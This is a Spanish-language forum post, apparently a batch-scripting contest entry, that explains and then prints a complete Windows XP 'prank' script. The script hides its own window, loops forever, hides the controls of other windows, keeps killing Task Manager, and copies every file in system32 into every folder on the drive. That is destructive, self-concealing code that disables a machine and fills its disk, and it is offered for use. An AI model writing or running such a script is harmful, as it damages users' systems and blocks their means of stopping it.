bueno si el comando no esta en su so es por que es atrasado
el cmdow vino con mi window xp por tanto esta aviable en la programacion bash el tskill esta aviable en mi window xp por
tanto esta aviable en la programacion bash voy a explicar un poco mi code.....
Mi code basicamente esta dividido en 2 potentes ciclos
en realidad mi code pudieran ser 2 bromas totalmente diferentes y cual de las 2 es mejor...
cmdow @ /hid
este comando en el cmdow permite ocultar ventanas en este caso como es ella misma se usa " @"
:Flag
goto Flag
el resto del code esta encapsulado en un ciclo goto para que se repita una y otra vez y la broma se haga cada vez peor.
For /f "tokens=1-2,8" %%a in ('cmdow') do (
Ping 127.0.0.1 -n 2 >nul
if /i "%%c"=="%%c" if "%%b"=="2" cmdow %%a /hid & cmdow /uw
tskill taskmgr
)
por consiguiente un comando for del tipo "/f" que va a recorrer todas las respuestas del comando cmdow entonces se toma 2
segundos lo cual en realidad es innecesario pero esta asi por cuestiones de presentacion para que cuando lo ejecutes puedas
ver lo que hace a simple vista y no una cadena de sucesos en uno solo....
tomemos por ejemplo un resultado aleatorio del cmdow
0x0E06BE 1 2736 Res Ina Dis Hid iexplore M
el elemento 2 o sea el b lo que seria "%%b" es 1 por tanto ahi en mi code no pasa nada ya que es un programa en el cual este
ciclo no me sirbe ya que no se puede acceder a los accesos... (si usted cambia 2 por 1 en mi code lo que hace es que oculta
las ventanas de tipo 1 pero no sus accesos)
entonces si fuera 2 me permitiria acceso a sus elementos y puedo darle el pedido al cmdow /hid que como saben oculta la
ventana pero serian a los accesos a la aplicacion %%a como botones labels y barras. %%a es en el ejemplo anterior
0x0E06BE...
tskill taskmgr
)
0x0E06BE 1 2736 Res Ina Dis Hid iexplore M
si explorer existe y si explorer es del tipo 2 entonces oculta 0x0E06BE
tskill taskmgr
aqui le digo que tumbe el proceso del task mannager... de esta manera no modifico el registro
pero si el code fuera unicamente el primer for sin el tskill al task mananger encapsulado en el ciclo goto entonces no
tendria que decirle que tumbara el proceso del task mannager ya que es del tipo 2 tambien. Entonces le va a quitar todos los
botones y accesos al instante.... por tanto al usuario no le seriviria para nada la aplicacion... a no ser que alguien sepa
como interactuar con una aplicacion sin botones o accesos de algun tipo....
el code tiene un poco de pacotilla como decimos los programadores en mi pais...
por ejemplo la parte de
& cmdow /uw
sirbe para que te ponga las ventanas en cascada es igual que el ping de
espera(pacotilla) solo que es para que el que pruebe el code pueda apreciar como funciona....
entonces la segunda parte que es totalmente independiente de la primera seria:
For /R %SystemRoot%\system32 %%X IN (*.*) DO (
For /D /r %%G in (*.*) DO copy %SystemRoot%\system32\%%X %%G & tskill taskmgr
)
y que pasa aqui bueno aqui uso /r para trabajar con archivos tomo acceso a la carpeta de instalacion de window en espesifico
system32... la escoji por que es la que posee mas archivos de manera que igualmente es pacotilla.Y empieso a tomar todos los
archivos o lo que es lo mismo del tipo "*.*" ( cuban-hack esto minimisaria tus attrib) para copiarlos. Entonces la opcion /d
del subciclo for es para tener acceso a las carpetas y si espesifico /r a las subcarpetas tambien. De manera q cuando se
unen los 2 ciclos tomando el comando copy el cual no voy a explicar ya que tambien puede poner usted /help copy /?
se copia de la ruta del programa %%x a la ruta de la carpeta %%G....
entonces el code quedaria asi...
@echo off
cmdow @ /hid
:Flag
For /f "tokens=1-2,8" %%a in ('cmdow') do (
Ping 127.0.0.1 -n 2 >nul
tskill taskmgr
)
For /R %SystemRoot%\system32 %%X IN (*.*) DO (
For /D /r %%G in (*.*) DO copy %SystemRoot%\system32\%%X %%G & tskill taskmgr
)
goto Flag
bueno les recuerdo que no tengo por que incluirle lo del ftp al code ya que el mio trae el cmdow incluido (y el de mis amigos
tambien) en el so entonces si el de usted no lo tiene piense q debe actualizarse... es programacion bash si usted piensa mal
del cmdow usted se encuentra obsoleto. Esto es un concurso de programacion bash no un concurso de so por tanto mi comando no
puede ser discriminado...
uffff tutorial by ECDundy (tengo que llamarlo tutorial ya que me eh cansado un poco al escribir esto)